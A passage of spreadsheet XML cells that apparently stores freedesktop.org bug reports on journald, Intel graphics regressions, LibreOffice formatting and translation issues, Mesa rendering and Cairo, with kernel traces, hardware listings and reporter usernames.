and I paste them on the fourth line (that is I need to scroll) after that the
pasted line is '#########'.</t>
  </si>
  <si>
    <t>zygimantas.b</t>
  </si>
  <si>
    <t>SYSTEMD-78337</t>
  </si>
  <si>
    <t>journald can be very slow (on btrfs ?)</t>
  </si>
  <si>
    <t>Created attachment 98555
ls -l output
I used journald in both Fedora and ArchLinux on a btrfs filesystem and I noticed on two occasions (once for each distribution) that journald can become very slow to the point where the boot proess is taking a very long time (more than 10 minutes).
After getting a shell I found that I couldn't access the log at all. Or it took a very long time (a few minutes for `journalctl -fa`).
Removing (or moving away) all files in /var/log/journal fixed the problem and the system was as fast as the first day.
I still have the old files for diagnosis if you want me to try something with them.
Here is the output of --verify and --disk-usage
$ journalctl -D /var/log/journal/e92df66897d24a499a6b6ecf7e6a30c2- --disk-usage
Journals take up 4.0G on disk.
The output of --verify command (that was successful) and the list of files is attached.</t>
  </si>
  <si>
    <t>mildred-bug.freedesktop</t>
  </si>
  <si>
    <t>DRI-101111</t>
  </si>
  <si>
    <t>[Regression] backlight flickering/display artifacting on Broadwell integrated graphics with 4.12-rc1</t>
  </si>
  <si>
    <t>As of 4.12-rc1 the following regression happens:
On a laptop with integrated Broadwell 5500U graphics I am experiencing a slight but noticeable and extremely annoying backlight flickering. This is especially apparent when the screen brightness is adjusted high on dark grey backgrounds where there is a noticeable sort of constant flickering/variation in brightness of the background sometimes striated with thin lines but usually just flickering slightly lighter or darker. Of course this occurs at all brightness levels but is more obvious there. This problem has only been present as of the release of 4.12-rc1 and is also present on drm-tip and drm-intel-nightly. It seems related to the updates in the i915 Intel integrated graphics module. It's problematic enough to be a fairly major annoyance on the 5500U Broadwell SoC.
The following is my system configuration. I can confirm that this problem occurs even with the latest intel firmware/drivers in Ubuntu 17.04 as well as on my primary system running Ubuntu 16.04.2 LTS and that it does not happen on 4.11.x or previous kernels.
uname -a
Linux delphi 4.12.0-041200rc1-generic #201705131731 SMP Sat May 13 21:32:36 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
sudo lshw -short
H/W path       Device     Class          Description
====================================================
                          system         HP Spectre x360 Convertible (N5R94UA)
/0                        bus            802D
/0/0                      memory         64KiB BIOS
/0/10                     memory         32KiB L1 cache
/0/11                     memory         32KiB L1 cache
/0/12                     memory         256KiB L2 cache
/0/13                     memory         4MiB L3 cache
/0/14                     processor      Intel(R) Core(TM) i7-5500U CPU @ 2.40GH
/0/16                     memory         8GiB System Memory
/0/16/0                   memory         4GiB Row of chips Synchronous 1600 MHz 
/0/16/1                   memory         4GiB Row of chips Synchronous 1600 MHz 
/0/100                    bridge         Broadwell-U Host Bridge -OPI
/0/100/2                  display        Broadwell-U Integrated Graphics
/0/100/3                  multimedia     Broadwell-U Audio Controller
/0/100/14                 bus            Wildcat Point-LP USB xHCI Controller
/0/100/14/0    usb1       bus            xHCI Host Controller
/0/100/14/0/1             input          USB Receiver
/0/100/14/0/3             multimedia     HP Truevision Full HD
/0/100/14/0/4             input          Touchscreen
/0/100/14/0/5             input          ITE Device(8350)
/0/100/14/0/7             communication  Bluetooth wireless interface
/0/100/14/1    usb2       bus            xHCI Host Controller
/0/100/16                 communication  Wildcat Point-LP MEI Controller #1
/0/100/1c                 bridge         Wildcat Point-LP PCI Express Root Port 
/0/100/1c/0               generic        RTS5227 PCI Express Card Reader
/0/100/1c.2               bridge         Wildcat Point-LP PCI Express Root Port 
/0/100/1c.2/0  wlo1       network        Wireless 7265
/0/100/1f                 bridge         Wildcat Point-LP LPC Controller
/0/100/1f.2               storage        Wildcat Point-LP SATA Controller [AHCI 
/0/100/1f.3               bus            Wildcat Point-LP SMBus Controller
/0/1           scsi0      storage        
/0/1/0.0.0     /dev/sda   disk           512GB SAMSUNG MZNTE512
/0/1/0.0.0/1   /dev/sda1  volume         449MiB Windows NTFS volume
/0/1/0.0.0/2   /dev/sda2  volume         99MiB Windows FAT volume
/0/1/0.0.0/3   /dev/sda3  volume         15MiB reserved partition
/0/1/0.0.0/4   /dev/sda4  volume         15EiB Windows FAT volume
/0/1/0.0.0/5   /dev/sda5  volume         838MiB Windows NTFS volume
/0/1/0.0.0/6   /dev/sda6  volume         146GiB Windows NTFS volume
/0/1/0.0.0/7   /dev/sda7  volume         89GiB EXT4 volume
/0/1/0.0.0/8   /dev/sda8  volume         8099MiB Linux swap volume
/1                        power          PK03056XL</t>
  </si>
  <si>
    <t>radhakrishna.sripada</t>
  </si>
  <si>
    <t>nicholas.stommel</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-92341</t>
  </si>
  <si>
    <t>Add Azerty French layout</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 118747
French azerty symbols
Here is patch for the normal french azerty layout
On my Ubuntu I also need to add the layout to 'evdev.xml' however I'm unable to find it in the repo where should this be added?
            azerty
            French (Azerty)
        </t>
  </si>
  <si>
    <t>UPOWER-106018</t>
  </si>
  <si>
    <t>Warning about unhandled action 'bind'</t>
  </si>
  <si>
    <t>Attaching a thunderbolt 3 dock that has a Logitech mouse and a USB keyboard attached to it I get quite a few warnings like this:
[...]
Apr 12 20:59:40 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-3/7-3:1.0/0003:046D:C082.0019
Apr 12 20:59:40 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-3/7-3:1.0
Apr 12 20:59:40 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-3
Apr 12 20:59:40 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3:1.0
Apr 12 20:59:40 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3
Apr 12 20:59:43 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.1/7-4.3.1:1.1
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.1/7-4.3.1:1.3
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.1/7-4.3.1:1.2
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.3/7-4.3.3:1.2/0003:046D:C539.0020
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.3/7-4.3.3:1.2
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.3/7-4.3.3:1.1/0003:046D:C539.001F
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.1/7-4.3.1:1.0
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.3/7-4.3.3:1.1
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.1
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.3/7-4.3.3:1.0/0003:046D:C539.001E
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.3/7-4.3.3:1.0
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.2/7-4.3.2:1.0/0003:04FE:000D.001D
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.3
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.2/7-4.3.2:1.0
Apr 12 20:59:44 x1.local upowerd[1084]: unhandled action 'bind' on /sys/devices/pci0000:00/0000:00:1d.0/0000:05:00.0/0000:06:01.0/0000:08:00.0/0000:09:02.0/0000:0c:00.0/usb7/7-4/7-4.3/7-4.3.2
The /sys/.../usb7/7-4/7-4.3/7-4.3.2 is the USB keyboard for example.</t>
  </si>
  <si>
    <t>gicmo</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-20215</t>
  </si>
  <si>
    <t>standards redirections broken</t>
  </si>
  <si>
    <t>When you try to access the xmlns of a standard directly to find out what its about you are redirected from
  http://www.freedesktop.org/standards/foo
to
  http://standards.freedesktop.org/foo
Thats a great idea.
Unfortunately the target link doesn't work it should be
  http://standards.freedesktop.org/foo-spec
Then it would actually work :)</t>
  </si>
  <si>
    <t>LIBREOFFICE-53238</t>
  </si>
  <si>
    <t>FORMATTING : Formatted Numbers as Currency are not Displayed when containing Arabic Letters</t>
  </si>
  <si>
    <t>Created attachment 65275
LibreOffice vs Open Office
Dear Sir
Calc Does not Display Numbers when Formatted as currency with Arabic letters near them
however Apache Open Office Does Not have this problem 
Please see Attachment</t>
  </si>
  <si>
    <t>walidaz</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-90415</t>
  </si>
  <si>
    <t>Add by blog to planet.freedesktop.org</t>
  </si>
  <si>
    <t>I am a Mesa/i965 contributor and I usually write about this stuff in my blog.
My feed is: http://blogs.igalia.com/itoral/feed/</t>
  </si>
  <si>
    <t>DRI-73985</t>
  </si>
  <si>
    <t>[BYT and probably others] panic on module unload</t>
  </si>
  <si>
    <t>[  160.975415] drm_kms_helper: drm: unregistered panic notifier
[  161.001979] [drm:gm45_get_vblank_counter] trying to get vblank count for disabled pipe B
[  161.002124] ------------[ cut here ]------------
[  161.002138] WARNING: CPU: 0 PID: 2114 at fs/sysfs/group.c:214 sysfs_remove_group+0xb9/0xc0()
[  161.002142] sysfs group c196f8c8 not found for kobject 'i2c-6'
[  161.002145] Modules linked in: coretemp kvm_intel kvm crc32_pclmul aesni_intel aes_i586 xts lrw gf128mul ablk_helper cryptd hid_sensor_accel_3d hid_sensor_gyro_3d hid_sensor_magn_3d hid_sensor_trigger industrialio_triggered_buffer kfifo_buf industrialio hid_sensor_iio_common snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc snd_seq_midi snd_seq_midi_event dm_multipath scsi_dh asix ppdev usbnet snd_rawmidi mii hid_sensor_hub microcode snd_seq rfcomm bnep snd_seq_device bluetooth snd_timer snd parport_pc binfmt_misc soundcore dw_dmac_pci dw_dmac_core mac_hid lp parport dm_mirror dm_region_hash dm_log hid_generic usbhid hid i915(O-) drm_kms_helper(O) igb dca ptp pps_core i2c_algo_bit drm(O) ahci libahci video
[  161.002233] CPU: 0 PID: 2114 Comm: rmmod Tainted: G        W  O 3.13.0-rc8+ #2
[  161.002236] Hardware name: NEXCOM VTC1010/Aptio CRB BIOS 5.6.5 09/24/2013
[  161.002240]  00000000 00000000 dbe0fd0c c164c093 dbe0fd4c dbe0fd3c c10538de c185b368
[  161.002251]  dbe0fd68 00000842 c185531d 000000d6 c11d6759 c11d6759 00000000 c196f8c8
[  161.002261]  dfa1e0e4 dbe0fd54 c1053933 00000009 dbe0fd4c c185b368 dbe0fd68 dbe0fd7c
[  161.002272] Call Trace:
[  161.002281]  [] dump_stack+0x41/0x52
[  161.002289]  [] warn_slowpath_common+0x7e/0xa0
[  161.002295]  [] ? sysfs_remove_group+0xb9/0xc0
[  161.002301]  [] ? sysfs_remove_group+0xb9/0xc0
[  161.002307]  [] warn_slowpath_fmt+0x33/0x40
[  161.002313]  [] sysfs_remove_group+0xb9/0xc0
[  161.002319]  [] dpm_sysfs_remove+0x37/0x40
[  161.002326]  [] device_del+0x34/0x170
[  161.002332]  [] device_unregister+0x21/0x60
[  161.002338]  [] ? sysfs_remove_link+0x16/0x30
[  161.002344]  [] ? class_compat_remove_link+0x42/0x50
[  161.002351]  [] i2c_del_adapter+0x1ad/0x2c0
[  161.002356]  [] ? i2c_do_del_adapter+0xe0/0xe0
[  161.002364]  [] ? kfree+0xcd/0x100
[  161.002409]  [] intel_dp_encoder_destroy+0x1d/0x70 [i915]
[  161.002437]  [] drm_mode_config_cleanup+0x3a/0x210 [drm]
[  161.002476]  [] intel_modeset_cleanup+0xbf/0xd0 [i915]
[  161.002504]  [] i915_driver_unload+0x246/0x2f0 [i915]
[  161.002530]  [] drm_dev_unregister+0x23/0x90 [drm]
[  161.002553]  [] drm_put_dev+0x3d/0x70 [drm]
[  161.002584]  [] i915_pci_remove+0x15/0x20 [i915]
[  161.002591]  [] pci_device_remove+0x2f/0xa0
[  161.002599]  [] __device_release_driver+0x61/0xc0
[  161.002606]  [] driver_detach+0x8f/0xa0
[  161.002615]  [] bus_remove_driver+0x4f/0xc0
[  161.002623]  [] driver_unregister+0x28/0x60
[  161.002629]  [] ? stop_cpus+0x32/0x40
[  161.002636]  [] ? module_refcount+0x90/0x90
[  161.002643]  [] pci_unregister_driver+0x15/0x60
[  161.002669]  [] drm_pci_exit+0x9f/0xb0 [drm]
[  161.002710]  [] i915_exit+0x1b/0x1d [i915]
[  161.002716]  [] SyS_delete_module+0x158/0x1f0
[  161.002724]  [] ? ____fput+0xd/0x10
[  161.002730]  [] ? task_work_run+0x7e/0xb0
[  161.002737]  [] sysenter_do_call+0x12/0x28
[  161.002742] ---[ end trace 4481aff8e92a409c ]---
[  161.002792] [drm:intel_crtc_cursor_set] cursor off
[  161.002798] [drm:intel_crtc_cursor_set] cursor off
[  161.002860] ------------[ cut here ]------------
[  161.002869] Kernel BUG at f84861f8 [verbose debug info unavailable]
[  161.002875] invalid opcode: 0000 [#1] SMP 
[  161.002882] Modules linked in: coretemp kvm_intel kvm crc32_pclmul aesni_intel aes_i586 xts lrw gf128mul ablk_helper cryptd hid_sensor_accel_3d hid_sensor_gyro_3d hid_sensor_magn_3d hid_sensor_trigger industrialio_triggered_buffer kfifo_buf industrialio hid_sensor_iio_common snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc snd_seq_midi snd_seq_midi_event dm_multipath scsi_dh asix ppdev usbnet snd_rawmidi mii hid_sensor_hub microcode snd_seq rfcomm bnep snd_seq_device bluetooth snd_timer snd parport_pc binfmt_misc soundcore dw_dmac_pci dw_dmac_core mac_hid lp parport dm_mirror dm_region_hash dm_log hid_generic usbhid hid i915(O-) drm_kms_helper(O) igb dca ptp pps_core i2c_algo_bit drm(O) ahci libahci video
[  161.002991] CPU: 0 PID: 2114 Comm: rmmod Tainted: G        W  O 3.13.0-rc8+ #2
[  161.002997] Hardware name: NEXCOM VTC1010/Aptio CRB BIOS 5.6.5 09/24/2013
[  161.003004] task: dbdd6800 ti: dbe0e000 task.ti: dbe0e000
[  161.003010] EIP: 0060:[] EFLAGS: 00010246 CPU: 0
[  161.003044] EIP is at i915_gem_object_ggtt_unpin+0x88/0x90 [i915]
[  161.003050] EAX: dfce3840 EBX: 00000000 ECX: dfafd690 EDX: dfce3874
[  161.003056] ESI: c0086b40 EDI: df962e00 EBP: dbe0fe1c ESP: dbe0fe0c
[  161.003062]  DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
[  161.003068] CR0: 8005003b CR2: b7718000 CR3: 1bec0000 CR4: 001007f0
[  161.003076] Stack:
[  161.003081]  00afc014 00000004 c0086b40 dfafc000 dbe0fe38 f8487e5a dfaa5400 c0086b40
[  161.003099]  dfafc000 dfaa5400 dfaa5414 dbe0fe58 f84741aa 00000000 f89c34b9 dfaa5414
[  161.003117]  dfaa5400 dfaa5400 f644b000 dbe0fe6c f89a5443 dfaa5400 f8505000 f644b000
[  161.003134] Call Trace:
[  161.003169]  [] i915_gem_context_fini+0xba/0x1c0 [i915]
[  161.003202]  [] i915_driver_unload+0x1fa/0x2f0 [i915]
[  161.003232]  [] drm_dev_unregister+0x23/0x90 [drm]
[  161.003259]  [] drm_put_dev+0x3d/0x70 [drm]
[  161.003294]  [] i915_pci_remove+0x15/0x20 [i915]
[  161.003306]  [] pci_device_remove+0x2f/0xa0
[  161.003317]  [] __device_release_driver+0x61/0xc0
[  161.003328]  [] driver_detach+0x8f/0xa0
[  161.003341]  [] bus_remove_driver+0x4f/0xc0
[  161.003353]  [] driver_unregister+0x28/0x60
[  161.003362]  [] ? stop_cpus+0x32/0x40
[  161.003372]  [] ? module_refcount+0x90/0x90
[  161.003383]  [] pci_unregister_driver+0x15/0x60
[  161.003413]  [] drm_pci_exit+0x9f/0xb0 [drm]
[  161.003458]  [] i915_exit+0x1b/0x1d [i915]
[  161.003468]  [] SyS_delete_module+0x158/0x1f0
[  161.003480]  [] ? ____fput+0xd/0x10
[  161.003488]  [] ? task_work_run+0x7e/0xb0
[  161.003499]  [] sysenter_do_call+0x12/0x28
[  161.003505] Code: 0f b6 4d f3 8d 51 0f 83 e1 f0 83 e2 0f 09 d1 84 d2 88 48 54 75 07 80 a7 91 00 00 00 7f 83 c4 04 5b 5e 5f 5d c3 8d b6 00 00 00 00  0b 8d b6 00 00 00 00 55 89 e5 57 56 53 83 ec 64 3e 8d 74 26
[  161.003586] EIP: [] i915_gem_object_ggtt_unpin+0x88/0x90 [i915] SS:ESP 0068:dbe0fe0c
[  161.003626] ---[ end trace 4481aff8e92a409d ]---</t>
  </si>
  <si>
    <t>LIBREOFFICE-60265</t>
  </si>
  <si>
    <t>Document converter wizard fails to find powerpoint files to convert</t>
  </si>
  <si>
    <t>when using the wizard to batch convert files it works nice with excel and word files but for powerpoint files it finds nothing to convert. doesn't find ppt nor pptx files
the document converter is accessible from the menu in the route:
File -&gt; Wizards -&gt; Document Converter</t>
  </si>
  <si>
    <t>anuragkanungo</t>
  </si>
  <si>
    <t>pasqual.milvaques</t>
  </si>
  <si>
    <t>LIBREOFFICE-54361</t>
  </si>
  <si>
    <t>FILEOPEN: Chart background in XLSX is transparent instead of white</t>
  </si>
  <si>
    <t>Created attachment 66462
Sample XLSX file and screenshots from LO 3.6.1 and Excel 2007
The chart background is transparent in the xlsx file from Excel 2007 if the default color was not changed.
Steps to reproduce:
1. In Excel 2007 create bar-chart with any data. Do not apply any color fill for chart background. Optionally apply some styles for data series.
2. Save the file as xlsx.
3. Open the file in Calc. The chart background is transparent instead of white and the border is also missed.
The bug is observed in LO 3.6.0 and 3.6.1 releases. Maybe it was in 3.5 too. I have not possibility to test this.</t>
  </si>
  <si>
    <t>heena.h.gupta</t>
  </si>
  <si>
    <t>lekow</t>
  </si>
  <si>
    <t>MESA-68805</t>
  </si>
  <si>
    <t>48 fps and 50 fps video decoding is stutter on UVD</t>
  </si>
  <si>
    <t>Created attachment 84985
dmesg
48 fps and 50 fps video decoding is stutter on UVD even 720p. UVD on Radeon 6310 with fglrx driver as able to decode up to 1080p 50 fps video with zero dropper frames so hardware is capable of decoding such framerate.
There is 48 fps sample http://dl.dropbox.com/u/11564551/Inception_trailer_48fps.mkv but I want to notice - many camcorders record 1080p50 or even 1080p60 video this days so this issue not just about trailers that upscaled from 24 to 48 fps.
Radeon HD 6310
Linux 3.11 with drm-next from this folder: http://kernel.ubuntu.com/~kernel-ppa/mainline/drm-next/current/ (build 3.11.0-996.201308300442). radeon.dpm is enabled.
libdrm 2.4.46+git1308291007.f17d41
xserver-xorg-video-radeon 7.2.0+git1308270847.8927d3
Mesa 9.3~git1308301002.74be77
libvdpau1 0.7-1
mplayer2 2.0-554-gf63dbad
Ubuntu 13.04 x86_64
Driver Mesa and firmwares installed from this PPA: https://launchpad.net/~oibaf/+archive/graphics-drivers
dmesg output attached.
vdpauinfo output attached.</t>
  </si>
  <si>
    <t>PIXMAN-4706</t>
  </si>
  <si>
    <t>Compile for SSE by default</t>
  </si>
  <si>
    <t>cairo/pixman/fbmmx.c has lines:
#if defined(__amd64__) || defined(__x86_64__)
#define USE_SSE
#endif
which excludes the Athlon-XP (which supports SSE) from running the SSE code.
(It looks like its excluding the Pentium 3 and Pentium 4 which also
support SSE)
Attached patch allows the Athlon-XP to run the SSE code.
Tested on my system with the imagepattern gtk snippet - the SSE version
of expand_alpha is called and works OK.
It seems odd having MMX selected at run-time and then selecting
SSE at compile-time. I think run-time detection for SSE may be a better
solution.</t>
  </si>
  <si>
    <t>XORG-20615</t>
  </si>
  <si>
    <t>SDVO VGA screen blank</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #17823 +++
------ Comment  #60 From Michael Fu  2009-03-11 19:08:54 PST  [reply] -------
(In reply to comment #59)
&gt; In comment #53 I said that I have unsuccessfull attempts of using the previous
&gt; xorg.conf file which was working previously. Which means I still have problem
&gt; making my 2nd monitor to display even thought xrandr is reflecting VGA-1
&gt; instead of TV-1. And I had attached my xorg.conf and log file for someone to
&gt; review it. I am waiting for further comments. Sorry for the misinterpretation.
&gt; 
what did you see on the 2nd VGA monitor ( I assume it's the one connected to
SDVO VGA )? Blank screen?
------- Comment #61 From Lew Shih Ming 2009-03-11 20:20:23 PST [reply] -------
Yes. You are correct. It's using SDVO. Only primary monitor is able to display
while the secondary is blank.</t>
  </si>
  <si>
    <t>michael.fu</t>
  </si>
  <si>
    <t>CAIRO-2729</t>
  </si>
  <si>
    <t>Negative dash offsets</t>
  </si>
  <si>
    <t>Negative dash offsets work strangely ... instead of treating the 
dash pattern as infinitely repeating in both directions patterns
of the pattern less than 0 are consider to be all on.
E.g. a 11 dash with an offset of 5 gives [611111]
The test case attached also reveals something else that suprised me ..
a 11 dash offset by 50% gives a noticeably striated result. But
thinking about it that's a consequence of the subsampling algorithm
The values are 120 and 135 out of 255 ... e.g +/- a sample column.</t>
  </si>
  <si>
    <t>DBUS-7844</t>
  </si>
  <si>
    <t>build failure extraneous parenthese in dbus-address.c</t>
  </si>
  <si>
    <t>http://jhbuild.bxlug.be/builds/2006-08-11-0000/logs/dbus/#build
Patch attached.</t>
  </si>
  <si>
    <t>fpeters</t>
  </si>
  <si>
    <t>CAIRO-16511</t>
  </si>
  <si>
    <t>Error: Cairo does not yet support the requested image format:</t>
  </si>
  <si>
    <t xml:space="preserve">
 Error: Cairo does not yet support the requested image format:
        Depth: 16
        Alpha mask: 0x00000000
        Red   mask: 0x00007c00
        Green mask: 0x000003e0
        Blue  mask: 0x0000001f
</t>
  </si>
  <si>
    <t>dvalin24</t>
  </si>
  <si>
    <t>LIBREOFFICE-82502</t>
  </si>
  <si>
    <t>Ctrl-F should show or focus the find box NOT toggle it</t>
  </si>
  <si>
    <t>I'm not sure of the history of this behaviour given the following:
https://issues.apache.org/ooo/show_bug.cgi?id=109504 (OOo request for the same)
https://bugs.freedesktop.org/show_bug.cgi?id=59101 (subsequent LOo request for toggle behaviour)
As mostly described in the OOo bug Ctrl-F should not toggle for the following reasons:
* Toggling the find dialogue is unlikely to be the expected behaviour for Ctrl-F for the vast majority of users based on the following application behaviours:
Firefox: shows/focuses
Chrome: shows/focuses
Internet Explorer: shows/focuses
Word (2013): shows/focuses
Excel (2013): shows/n/a (modal)
Windows Explorer: focuses (always shown)/focuses
* Esc already closes the find bar when focused.
* When a user is used to being able to reliably find using Ctrl-F then typing in other applications (see above examples) if they do the same in LO when the find bar is already shown/focused they instead end up closing the find bar and overwriting or inserting text in the document.
* The visual indicator for the needed action to search the document currently can be as little as a blinking cursor in the find box (for example in a spreadsheet where the cell highlight looks identical whether the find box is focused or not.
* Behaviour now:
Find bar showing/unfocused: Ctrl-F focuses subsequently typing searches
Find bar showing/focused: Ctrl-F closes subsequently typing inserts/overwrites text in document
Find bar not showing: Ctrl-F shows subsequently typing searches
To close the find box via keyboard (unfocused): Ctrl-F *twice* (or Ctrl-F Esc)
To close the find box via keyboard (focused): Ctrl-F *once* (or Esc)
* Behaviour with Ctrl-F configured to show or focus find *only*:
Find bar showing/unfocused: Ctrl-F focuses subsequently typing searches
Find bar showing/focused: Ctrl-F non-op subsequently typing searches
Find bar not showing: Ctrl-F shows subsequently typing searches
To close the find box via keyboard (unfocused): Ctrl-F Esc
To close the find box via keyboard (focused): Esc (or Ctrl-F Esc)
The second set of behaviours is better for the following reasons:
* Expected
* Can't result in accidental typing into document dependent on state
* Guaranteed sequence to search document (don't need to look for find box focus)
* Guaranteed sequence to close search box (don't need to look for find box focus)
* No keystroke penalty under any circumstances vs. current behaviour</t>
  </si>
  <si>
    <t>LIBREOFFICE-63141</t>
  </si>
  <si>
    <t>Spanish translation replaces Heading (Encabezado) with Header (Encabezamiento)</t>
  </si>
  <si>
    <t>Created attachment 77459
ODT example created with LibO 3.5.7
Since LibO 3.6 all headings of my files saved with prior LibO version looked smaller. It still happens with LibO 4.0
I could not realize what was happening until today that I downloaded LibO 4.0.2 and didn't use the translated UI.
I will try to describe the problem carefully attaching a ODT file and 3 screenshots.
System: Kubuntu 12.04 with LibO 3.5.7 installed from repositories
Description:
The first screenshot shows a file created with LibO 3.5.7 installed from Kubuntu repos. All formating is done through styles.
So the header has a the Header style (translated as Encabezamiento en LibO 3.5 and prior) headings has their conrresponding Heading styles (Encabezados) and so for bodytext. 
The styles used in this file are:
Â· Encabezado/Heading: Liberation Sans 14 pts
Â· Encabezados/Heading 1: 115% of Heading = 16.1 pts
Â· Encabezamiento/Header: 9 pts
The second screenshot shows this file opened with LibO 4 without the spanish translation. It shows a correct formating of the file with exactly the same styles as defined in files saved with LibO 3.5.
The third screenshot shows the same file opened with LibO 4 but having already installed the translated UI.
Now the styles has become
Â· Encabezado/Heading: Liberation Sans 9 pts (as was Header)
Â· Encabezados/Heading 1: 115% of Heading = 10.3 pts
Â· Encabezamiento/Header: doesn't exist
So the problem is that the spanish translation is using Header in place of Heading. When saving this file with LibO 4 with spanish UI opening with Lib 3.5 looks also wrong with the modified styles.</t>
  </si>
  <si>
    <t>LIBREOFFICE-59630</t>
  </si>
  <si>
    <t>Server Installation GUI 3.0: Does not recognize master installation files.</t>
  </si>
  <si>
    <t>I tested with master~2013-01-19_22.38.36_LibO-Dev_4.1.0.0.alpha0_Win_x86.msi it's not in the names pattern.
Not a big thing master testers have enough experience ...</t>
  </si>
  <si>
    <t>MESA-100790</t>
  </si>
  <si>
    <t>[REGRESSION] Civilization VI start screen rendered incorrectly with Mesa 17.1-rc2 on Skylake GT2</t>
  </si>
  <si>
    <t>Created attachment 131026
Garbled screen
The Civilization VI start screen (unfortunately so far I haven't found a way to reproduce this using only open code) is displayed incorrectly (see attached screenshot) with Mesa 17.1-rc2.
Mesa 17.0.4 works well.
Graphics card is:
00:02.0 0300: 8086:191b (rev 06) (prog-if 00 [VGA controller])
        Subsystem: 1025:105b
        Flags: bus master fast devsel latency 0 IRQ 126
        Memory at 82000000 (64-bit non-prefetchable) [size=16M]
        Memory at 90000000 (64-bit prefetchable) [size=256M]
        I/O ports at b000 [size=64]
        [virtual] Expansion ROM at 000c0000 [disabled] [size=128K]
        Capabilities: 
        Kernel driver in use: i915
        Kernel modules: i915
Linux kernel 4.11-rc5 libdrm 2.4.80 latest released Xorg bits.</t>
  </si>
  <si>
    <t>MESA-40448</t>
  </si>
  <si>
    <t>Unigine Sanctuary: window disappear when changing settings</t>
  </si>
  <si>
    <t>When changing some settings in Unigine that causes the engine to restart itself (for example shaders quality) after restart the Unigine window disappear. It is still running just there is no window any more. 
4df137691ee29bb812347fa2c5f19095243ede22 is the first bad commit
commit 4df137691ee29bb812347fa2c5f19095243ede22
Author: Jesse Barnes 
